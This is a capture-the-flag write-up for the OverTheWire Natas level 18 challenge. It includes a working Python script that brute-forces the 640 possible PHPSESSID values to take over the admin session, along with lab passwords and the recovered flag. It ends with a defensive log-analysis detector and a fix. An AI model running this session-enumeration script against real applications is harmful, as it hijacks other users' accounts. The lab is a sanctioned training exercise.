[OverTheWire] Natas – Level 18

http://natas18.natas.labs.overthewire.org/

Please login with your admin account to retrieve credentials for natas19.

Click View sourcecode:

[php]";
    }
}
/* }}} */
function my_session_start() { /* {{{ */
    if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
        if(!session_start()) {
            debug("Session start failed");
            return false;
        } else {
            debug("Session start ok");
            if(!array_key_exists("admin", $_SESSION)) {
                debug("Session was old: admin flag set");
                $_SESSION["admin"] = 0; // backwards compatible, secure
            }
            return true;
        }
    }

    return false;
}
/* }}} */
function print_credentials() { /* {{{ */
    if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
        print "You are an admin. The credentials for the next level are:";
        print "Username: natas19\n";
        print "Password: ";
    } else {
        print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
    }
}
/* }}} */

$showform = true;
if(my_session_start()) {
    print_credentials();
    $showform = false;
} else {
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
        session_id(createID($_REQUEST["username"]));
        session_start();
        $_SESSION["admin"] = isValidAdminLogin();
        debug("New session started");
        $showform = false;
        print_credentials();
    }
}

if($showform) {
?> [/php]

This level uses a custom session manager whose PHPSESSID value is chosen at random from the range (1, 640). The admin's session ID can only be one of those values too, so we try each value in turn until one succeeds:

[python]import urllib, urllib2

def get_url_content(url, cookie, post_data):
    # POST when form data is supplied, otherwise GET
    if post_data is not None:
        req = urllib2.Request(url, urllib.urlencode(post_data))
    else:
        req = urllib2.Request(url)

    req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0')

    if cookie is not None:
        req.add_header('Cookie', cookie)
    if post_data is not None:
        req.add_header('Content-type', 'application/x-www-form-urlencoded')

    source = urllib2.urlopen(req).read()
    return source

# HTTP Basic authentication for the level itself
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, "http://natas18.natas.labs.overthewire.org/index.php?debug", 'natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))

# Try each candidate session ID until the admin page is returned
for i in range(640):
    cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % i
    source = get_url_content('http://natas18.natas.labs.overthewire.org/index.php?debug', cookie, None)
    source = source.split('\n\n')[1].split('\n\n')[0]
    print '%3d: %s' % (i, source)

    if 'You are an admin' in source:
        break[/python]

The result: the admin's SESSID = 84:

[sh]84:
DEBUG: Session start ok
You are an admin. The credentials for the next level are:

Username: natas19
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
View sourcecode[/sh]

→ flag = 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs.
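From the defender's side, the loop above appears in logs as one client presenting many different PHPSESSID values in a short time. The Python 3 code below is an added example, not part of the original write-up; the record format, IP addresses, window and threshold are constructed assumptions.

```python
import re
from collections import defaultdict, deque

# Matches the PHPSESSID value anywhere in a Cookie header.
SESSID_RE = re.compile(r"(?:^|;\s*)PHPSESSID=([^;\s]+)")


def find_enumerators(records, window=60, max_ids=5):
    """Flag clients that present many distinct session IDs in a short time.

    records: time-ordered (timestamp_seconds, client_ip, cookie_header).
    Returns {client_ip: peak number of distinct PHPSESSID values seen
    within `window` seconds} for clients whose peak exceeds `max_ids`.
    """
    recent = defaultdict(deque)  # client -> (timestamp, session_id) in window
    flagged = {}
    for ts, client, cookie in records:
        match = SESSID_RE.search(cookie or "")
        if not match:
            continue
        queue = recent[client]
        queue.append((ts, match.group(1)))
        while ts - queue[0][0] > window:  # drop entries older than the window
            queue.popleft()
        distinct = len({sid for _, sid in queue})
        if distinct > max_ids:
            flagged[client] = max(flagged.get(client, 0), distinct)
    return flagged


def constructed_records():
    """Constructed sample traffic (assumed values, not taken from the page)."""
    recs = []
    # Ordinary user: one session ID reused for several minutes.
    recs += [(t, "198.51.100.7", "PHPSESSID=412") for t in range(0, 300, 30)]
    # User who logs in a second time: two IDs, minutes apart.
    recs += [(10, "198.51.100.9", "PHPSESSID=77"),
             (200, "198.51.100.9", "lang=en; PHPSESSID=301")]
    # One client presenting IDs 0..84 in order, two requests per second.
    recs += [(100 + i // 2, "203.0.113.50", "PHPSESSID=%d" % i)
             for i in range(85)]
    return sorted(recs, key=lambda r: r[0])


if __name__ == "__main__":
    for client, peak in find_enumerators(constructed_records()).items():
        print("%s presented %d distinct PHPSESSID values within 60 s" % (client, peak))
```

Detection of this kind is a backstop: the root cause is the 640-value ID space that createID produces, and letting PHP generate its default long random session ID removes it.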
